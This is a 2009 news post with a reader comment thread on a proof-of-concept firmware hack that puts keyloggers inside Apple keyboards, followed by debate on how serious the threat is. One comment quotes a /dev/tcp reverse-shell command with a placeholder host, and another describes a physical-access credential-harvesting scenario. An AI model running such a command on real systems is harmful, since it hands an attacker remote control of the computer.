Linked by Thom Holwerda on Sat 1st Aug 2009 18:22 UTC
Apple Almost everything has a processor and/or memory chips these days, including keyboards. Apple's keyboards are no exception; they have 8Kb of flash memory, and 256 bytes of RAM. K. Chen has found a way to very easily install keyloggers and other possibly malicious code right inside these Apple keyboards (more here). Proof of concept code is here as well.
Order by: Score:
Leave it to Apple
by sbergman27 on Sat 1st Aug 2009 18:39 UTC
sbergman27
Member since:
2005-07-24

"The more they overthink the plumbing, the easier it is to stop up the drain" said Scotty in Star Trek III.

Leave it to Apple to take something that has always been safe before, and turn it into a security nightmare via over-design.

What other Apple-specific dangers lurk in seemingly innocuous Apple hardware, I wonder? Taking into account recent news about real life safety and security dangers in Apple hardware, and Apple's attempts to suppress news of them, it would not surprise me to see Apple mice spontaneously bursting into flames, or Apple monitors quietly deciding to start emitting x-rays.

Their corporate offices could go up in a fireball, and their sole surviving PR drone would try to blame it on Mr. Coffee.

Edited 2009-08-01 18:46 UTC

Reply Score: 2

RE: Leave it to Apple
by Thom_Holwerda on Sat 1st Aug 2009 19:45 UTC in reply to "Leave it to Apple"
Thom_Holwerda Member since:
2005-06-29

Chen theorises that its because Apple needs to rush hardware to market, so instead of properly testing their firmware - which shouldn't be that hard, it's a frakking keyboard - they just make the firmware flashable instead. This is indeed what happened when the keyboard first came out.

What we need to know is this: how hard is it to achieve this on keyboards from other manufacturers?

Edited 2009-08-01 19:45 UTC

Reply Score: 2

RE[2]: Leave it to Apple
by sbergman27 on Sat 1st Aug 2009 19:57 UTC in reply to "RE: Leave it to Apple"
sbergman27 Member since:
2005-07-24

What we need to know is this: how hard is it to achieve this on keyboards from other manufacturers?

Even if it were possible (and I suspect this is going to turn out to be Apple specific) the exploit would surely need to be customized for the keyboard family. And for the platform.

Apple would still be the logical target because MacOSX and Apple keyboards go together like... oh... "War" and "Pestilence". If the exploit code will run, you can be reasonably certain that the keyboard is going to be Apple, and thus vulnerable, most of the time.

Note that this reasoning applies to any future hardware-based exploits, and not just to keyboards.

Edited 2009-08-01 20:06 UTC

Reply Score: 3

RE[2]: Leave it to Apple
by Johann Chua on Sun 2nd Aug 2009 02:52 UTC in reply to "RE: Leave it to Apple"
Johann Chua Member since:
2005-07-22

Now I really need to find a Griffin iMate. Never cottoned to the shiny new Apple keyboards, so I'd prefer using my old Apple Extended II keyboard when I get a Mac mini.

Reply Score: 2

shiva
Member since:
2007-01-24

A big "advantage" of Apple's exclusive hardware... :-)

Reply Score: 4

kokuyoen Member since:
2008-06-13

They're "inside" the computer! And I'm not talking about the files! People are always telling me Apple computers are safer due to better security measures. Riiiight.

Reply Score: 1

RE: Comment by kokuyoen
by sbergman27 on Sat 1st Aug 2009 19:44 UTC in reply to "Comment by kokuyoen"
sbergman27 Member since:
2005-07-24

People are always telling me Apple computers are safer due to better security measures. Riiiight.

Do the Psystar clones exhibit this egregious security hole? Or is just Apple hardware that is so unsafe?

Edited 2009-08-01 19:46 UTC

Reply Score: 3

RE[2]: Comment by kokuyoen
by DrillSgt on Sat 1st Aug 2009 19:48 UTC in reply to "RE: Comment by kokuyoen"
DrillSgt Member since:
2005-12-02

Do the Psystar clones exhibit this egregious security hole? Or is just Apple hardware that is so unsafe?


That is a really good question. Since the flaw itself is in the firmware for the keyboard, I would hazard a guess if the person was using one of the Apple keyboards, then yes, they would be. Of course I have no idea without having the hardware to test it on.

Reply Score: 2

RE[3]: Comment by kokuyoen
by sbergman27 on Sat 1st Aug 2009 20:04 UTC in reply to "RE[2]: Comment by kokuyoen"
sbergman27 Member since:
2005-07-24

Since the flaw itself is in the firmware for the keyboard, I would hazard a guess if the person was using one of the Apple keyboards, then yes, they would be.

But Psystar doesn't use Apple hardware. They come with Logitech keyboards and mice, so far as I know.

Reply Score: 2

RE[4]: Comment by kokuyoen
by shiva on Sat 1st Aug 2009 20:23 UTC in reply to "RE[3]: Comment by kokuyoen"
shiva Member since:
2007-01-24

Probably the hackintoshes are more secure than Macs because of the wide variety of hardware for PCs !

This is the reason why i am happy with my grey PC with a linux distribution. There are M x N different hardware/software combinations to malwares infect, which is much less probable.

Reply Score: 2

RE[5]: Comment by kokuyoen
by sbergman27 on Sat 1st Aug 2009 20:44 UTC in reply to "RE[4]: Comment by kokuyoen"
sbergman27 Member since:
2005-07-24

Probably the hackintoshes are more secure than Macs because of the wide variety of hardware for PCs !

Yeah, at least the Windows monoculture exhibits variety in the hardware. MacOSX on Apple hardware is a devastating epidemic looking for a place to happen.

Edited 2009-08-01 20:44 UTC

Reply Score: 3

RE[4]: Comment by kokuyoen
by DrillSgt on Sat 1st Aug 2009 20:24 UTC in reply to "RE[3]: Comment by kokuyoen"
DrillSgt Member since:
2005-12-02

But Psystar doesn't use Apple hardware. They come with Logitech keyboards and mice, so far as I know.


Good point. It would come down to if Logitech keyboards can be exploited in this manner then.

Reply Score: 2

1984
by JayDee on Sat 1st Aug 2009 19:03 UTC
JayDee
Member since:
2009-06-02

For the next 1984 days, OSNews and every other technology news site and blog should write something negative about Apple.


You guys are on a roll! Keep it coming! ;-)

Reply Score: 4

Apple is probably not the only one
by jokkel on Sat 1st Aug 2009 19:47 UTC
jokkel
Member since:
2008-07-07

I strongly suspect that Apple is the only one. A lot of other USB keyboards probably have the same problem.

This doesn't excuse anything of course. It's quite scary to think, that you own keyboard is spying on you.

Apple is an attractive target for hacking, because exploits always make headlines. I hope Apple will cooperate more with security researches in the future. Their security track record isn't that great. Apple relied too long an too much on security by obscurity and being a small target.

Reply Score: 2

deathshadow Member since:
2005-07-12

That would be my guess, Apple these days uses a lot of the same chips under the hood as it's competitors, (ok, all the same chips now) - as such I'd not be surprised to find out other USB keyboards are at risk.

Makes me glad I'm still using a nice safe near indestructible PS/2 model M - Actually it's a bastardization the keyboard mechanicals are from a 370 version, the internal board and case is from the AT version with the phone jack, but I have the cable from a PS/2 one which works (since the only difference between PS/2 and AT keyboard is the plug at the PC end)

It really is as sbergman27 said an overthinking of the plumbing.

8K of flash and 256 bytes of RAM? *** sake what's in there a PicAxe or Atmel? FOR A KEYBOARD?!? Sad when a keyboard has more computing power and live storage than my first computer.

Also proves something I've been saying for years, the illusion of safety provided by Apple won't last... since once enough people are using them to be a viable target they've got little to nothing standing between the user and total pwnage compared to other OS and hardware bases.

Edited 2009-08-01 20:35 UTC

Reply Score: 2

sbergman27 Member since:
2005-07-24

Also proves something I've been saying for years, the illusion of safety provided by Apple won't last... since once enough people are using them to be a viable target they've got little to nothing standing between the user and total pwnage compared to other OS and hardware bases.

Even its Unix foundation is a bit of an illusion from a security standpoint. While the rest of the POSIX world has been moving forward with a variety of hardening techniques and security frameworks, Apple has been fine-tuning their icon colors.

Securitywise, MacOSX's Darwin underpinnings look like something out of the mid 1990s.

Reply Score: 7

tupp Member since:
2006-11-12

While the rest of the POSIX world has been moving forward with a variety of hardening techniques and security frameworks, Apple has been fine-tuning their icon colors.

This line is an instant classic!

Reply Score: 3

not impossible at all
by jabbotts on Sat 1st Aug 2009 23:13 UTC in reply to "RE: Apple is probably not the only one"
jabbotts Member since:
2007-09-06

My Logitech G15 must have some chips inside there. I can see much of it done on the driver side but still, it's much more than a simple button pad pushing signal out a ps2 or big DIN port.

I can see it now.. "WOW Accounts hijacked through keyboard zombies!"

Reply Score: 2

Kroc Member since:
2005-11-10

Sorry to burst your bubble, but your PS2 keyboard can be read from a plug socket http://news.bbc.co.uk/1/hi/technology/8147534.stm

Reply Score: 1

mrhasbean Member since:
2006-04-03

Sorry to burst your bubble, but your PS2 keyboard can be read from a plug socket http://news.bbc.co.uk/1/hi/technology/8147534.stm


Chorlte

Reply Score: 2

Before everyone flies off the handle...
by darknexus on Sat 1st Aug 2009 20:37 UTC
darknexus
Member since:
2008-07-15

This certainly doesn't seem as bad as the sensationalists would like you to believe. The Apple firmware updater has to be run, a break point is set and from there your keyboard can be compromised. First off, how is a remote web site going to run this Apple firmware updater? What modern browser can arbitrarily run executables on the host machine (well, perhaps, aside from IE6 but that's hardly modern). Second, I've used the Apple firmware updater. Before it does anything, it prompts you to update the keyboard firmware. This is not something that will happen out of the blue, you must explicitly run the firmware updater first and accept the upgrade and, on OS X anyway, you then need to enter your administrator's password to confirm the action.
So what we basically have here is a vulnerability that requires physical access to the machine in order to be enabled, and further relies on the keyboard not being at the latest firmware version, as the firmware updater won't download or run an image unless it's newer than the current one installed. The only way I can see this being a serious problem is if a hacked firmware image were somehow placed on Apple's servers (rather unlikely), or dns poisoning to redirect the firmware updater to a different server (possible, but for a rather small payoff by modern standards of cracking). It's a threat, certainly, but not a huge one.

Reply Score: 6

jabbotts Member since:
2007-09-06

Interviews after this years Pwn2Own described osX security around the browser as pretty open. A reason it was targeted was that the Safari browser does not provide the same protective layers that other browsers offer (though, the next major version addresses this in some ways I hear). Outcome, browser can run executable code.

Now it's on the system with no sandboxing to break out of. It needs only escalate it's privaledge to root. Not easy on a well configured posix base but not impossible.

Now it's root, it redirects input/output and send the [OK] button press when firmware flasher requires it. Maybe it presents a spoofed layer overtop the actual firmware messagebox and gets it done a-la social engineering.

Injecting break points is a standard part of running software and easily done with root privaledge. Maybe it simply patches in memory as needed for that step.

It's not like your average skript kiddie is going to get this one but gov and criminal enterprise are already working on it. Attacks never get worse, they only ever get better. If left unpatched, this will become a problem.

Reply Score: 3

I see a lot of misinformed comments
by Lo_Phat on Sat 1st Aug 2009 21:16 UTC
Lo_Phat
Member since:
2009-07-08

All barring one have been knee jerk misinformed Fanboi style comments.

A vulnerability that requires physical access to the machine in order to be enabled, and relies on the keyboard not being at the latest firmware version (the firmware updater won't download or run an image unless it's newer than the current one installed) is hardly world shaking news.

I applaud the researchers for finding this and any other potential vulnerability but Im not going to lay awake at night worrying about this one.

Reply Score: 0

smashIt Member since:
2005-07-06

well, you seem to be the misinformed fanboi if you believe that apple are the only ones that can write those magical lines of coded needed to flash the firmware

Reply Score: 2

WereCatf Member since:
2006-02-15

A vulnerability that requires physical access to the machine in order to be enabled, and relies on the keyboard not being at the latest firmware version (the firmware updater won't download or run an image unless it's newer than the current one installed) is hardly world shaking news.

Umm, they only need to disassemble the firmware updater and copy the lines of code that do the actual magic of updating the firmware, OR they can just fool it to think the firmware is not the latest available one. POOF! That was the sound of your argument just getting shot down.

Secondly, it does not require physical access: if you can get malware on the Mac then you have access to the keyboard firmware, too.

Thirdly, you don't need to get malware on the Mac at all or know any passwords or anything if you just can get physical access to the keyboard and attach it to your netbook/notebook/laptop and update the firmware there.

Reply Score: 3

darknexus Member since:
2008-07-15

But then you have this other problem... you'd need to convince the users to run it, since it couldn't be done by a web scripting language and even Safari won't just execute an arbitrary file on the machine.

Reply Score: 2

WereCatf Member since:
2006-02-15

But then you have this other problem... you'd need to convince the users to run it, since it couldn't be done by a web scripting language and even Safari won't just execute an arbitrary file on the machine.

Do you mean the case of malware infecting the computer and then patching the keyboard? Well, the malware would get on the computer the same way it usually does... either some security hole, or an unknowing user. The firmware on the keyboard doesn't need to be executed, it's always running on the keyboard as long as there's power to it..

Reply Score: 2

anduril Member since:
2005-11-11

Most people can be convinced fairly easily to do something stupid on the computer. This is arguably what makes malware so effective on windows (Ohhh...shiney shit lets install!). Do you really think mac users are so superior that mom and pop wouldn't click yes, run this crap if it looks official?

Then, its game over. OSX isnt truely anymore secure from a programming standpoint (as the researchers and hackers are showing) but rather due to sizing and time constraints. Why waste time on 5% (or whatever the install base is) and exploiting a hole when you can easily exploit a hole with a user base thats 90%?

Reply Score: 1

Oh dear god we're all doomed.
by Finchwizard on Sun 2nd Aug 2009 00:54 UTC
Finchwizard
Member since:
2006-02-01

Something needs physical access to the keyboard.....

It's almost as scary as those PS2 Key Loggers that used to goto between keyboard and computer, those things were an epidemic......oh wait, not they weren't.

I mean seriously, any excuse to slam Apple these days with something everyone else does as well.

Reply Score: 4

RE: Oh dear god we're all doomed.
by WereCatf on Sun 2nd Aug 2009 01:00 UTC in reply to "Oh dear god we're all doomed."
WereCatf Member since:
2006-02-15

Something needs physical access to the keyboard.....

It's a firmware hack...you DON'T need physical access to the keyboard if you can flash the firmware via a virus/malware/backdoor/etc. So yes, it's quite a bit more serious than those PS2 keyloggers.. besides, those were rather easy to notice if you looked there. But a firmware hack cannot be detected with plain eyesight, and even in software you'd need to read the firmware and verify it against a known good one.

Reply Score: 2

Kabal Member since:
2005-07-09

Well, in that implementation you have to hit return a few times quickly to read the contents out, so you do have to have access to the keyboard to do anything with it.

But anyway, if I am at a point where I am already running arbitrary code on a users machine, I think I would rather install a keylogger in software that has the capability to send the keystrokes directly to my server, rather than install a much crappier keylogger into their keyboard ;)

It's a cute hack but it's not really the end of the world.

Edited 2009-08-02 01:39 UTC

Reply Score: 1

PlatformAgnostic Member since:
2006-01-02

You're right that this isn't exactly the end of the world. But it isn't a totally unreasonable thing for a bored hacker to do IN ADDITION to installing a standard software keylogger. If the attack installs a firmware rootkit in the keyboard, it would be tough to know about an eradicate since even a totally clean install would not get rid of it.

On another note, I don't think we have any reason to believe that this problem applies solely to apple. Other manufacturers probably also have firmware on their keyboards and perhaps they don't bother to implement a proper code-signing system on their keyboard microcontrollers (it would be prohibitively expensive probably).

Reply Score: 2

darknexus Member since:
2008-07-15

And a code signing would be absolutely useless, seeing as how that signature would simply be duplicated. The thing about code signing is that it's only useful as long as the signature isn't reversed, as soon as it is the signature might as well not even be there. On a software platform such as a typical PC or even a cel phone, this wouldn't be a big deal as the signature certificates could simply be updated in the background, but on a tiny embedded system it would be worse than useless even if they did bother to implement it. I doubt many would continuously update their keyboard firmware for new signatures, and it would be too risky to have firmware updates applied automatically without prompting in case the device was bricked due to a crash or loss of power.

Reply Score: 2

bert64 Member since:
2007-04-23

If you were to install a hardware keylogger like this, how would you get the logs out of the system?
You'd still need a software component running in order to read the logs from the flash and transmit them away somewhere, and this software component would be just as vulnerable as a regular keylogger to being removed.

This just sounds like a clever idea in theory that provides no real benefit in practice.

Reply Score: 1

WereCatf Member since:
2006-02-15

Nope, it doesn't provide that much of real benefit except in cases where you have physical access to the keyboard but the system is secured too tightly to hack into. The keyboard has room for 1000 keystrokes so it'd log your username and password, and as you most likely log in to other services too right after login those credentials would also be stored.

Now, let's say that you've been hired to just clean the floors, wash the windows and such and you do that on the off-hours when no one else is around. You just pop out your netbook, upload the hacked firmware to all nearby machines, finish your job, and then next day download the recorded keystrokes. Voila! You have all the most used usernames and passwords of that company and can do as you please.

Just because you lack the imagination to utilize this doesn't mean it cannot be utilized by someone with more imagination.

Reply Score: 2

Bounty Member since:
2006-09-18

That's why you never let custodians with netbooks or pre-hacked hardware keyboards into your top secret area. Those damn custodians are always swapping out NICs with pre-hacked sniffing NICs, keyboards with hardware keyloggers inside the keyboards, quick cams that spy on your keyboard (or retina!), microphones in your speakers, peep hole cameras in your mouse. They replace your power cord with an ER sensing and recording one to sniff what you type. They dust your fingerprint scanner and make gel fingers. If you ever find a mousepad with a battery and a wifi chip in it, it's probably those damn custodians! Damn ACME "custodians" are always hacking stuff.

Reply Score: 3

stanbr Member since:
2009-05-22

I was thinking the same.. then I read the full article here: http://www.digitalsociety.org/apple-keyboards-hacked-and-possessed/

So, in fact, its REALLY EASY to send these to a remote server WITHOUT using another malware... ;)

From the article:
"exec /bin/sh 0</dev/tcp/IP/PORT 1>&0 2>&0

This would instantly connect the computer to the attacker’s computer and instantly give the attacker full control of the computer at which point additional rootkits could be installed."

Cya.

Reply Score: 1

Drumhellar Member since:
2005-07-12

Something needs physical access to the keyboard.....


The MacOS X computer that your keyboard is plugged into has physical access to the keyboard. Actually, it has physical access to the firmware. Run a piece of malware on your desktop (which, again, has physical access to the keyboard) and you're compromised.

Reply Score: 1

Tuishimi
Member since:
2005-07-06

...some of the articles posted on OSNews are obviously the result of the OSNews teams' keyboards being hacked and taken over.

Reply Score: 3

security by obscurity
by dvhh on Sun 2nd Aug 2009 16:07 UTC
dvhh
Member since:
2006-03-20

some of the user blind themselves, of course this is not a remote way to hack your mac, but that can be part of social engineering process.
Most first typed char on a system are mostly login credential which can give a second foothold on the system by installing other stuff.
Of course it require physical access, but again most "secure OS" users are downplaying some remote vulnerability as long as it is not root access.

Reply Score: 1

Macbooks too?
by theoreilly on Sun 2nd Aug 2009 23:42 UTC
theoreilly
Member since:
2009-08-02

I'm wondering whether this vulnerability also applies to my macbook pro. I'm guessing it does, yet remain hopeful.

Reply Score: 1

So...
by Jimbob on Mon 3rd Aug 2009 00:02 UTC
Jimbob
Member since:
2005-07-07

We sit and argue about something which sounds sensational but in reality is not a huge threat and it keeps us nicely blindsided from the troubles of the world. The man who was shown hacking the keyboard works for the CIA. Oooops... I shouldn't have said CIA with an Apple keyboard...


------

There's a knock on my door...

Edited 2009-08-03 00:03 UTC

Reply Score: 1

RE: So...
by kvarbanov on Mon 3rd Aug 2009 08:26 UTC in reply to "So..."
kvarbanov Member since:
2008-06-16

Are you sure that he works for CIA ? If yes, does it really matter ? Generally, I don't care for exploits, especially if they aren't made for Linux ;) Windows users - watch out ;) ! as always ...

Reply Score: 1

RE[2]: So...
by Jimbob on Mon 3rd Aug 2009 23:03 UTC in reply to "RE: So..."
Jimbob Member since:
2005-07-07

You can always tell... it's the way they furrow their brows... dead give away... ssshhhh...

Reply Score: 1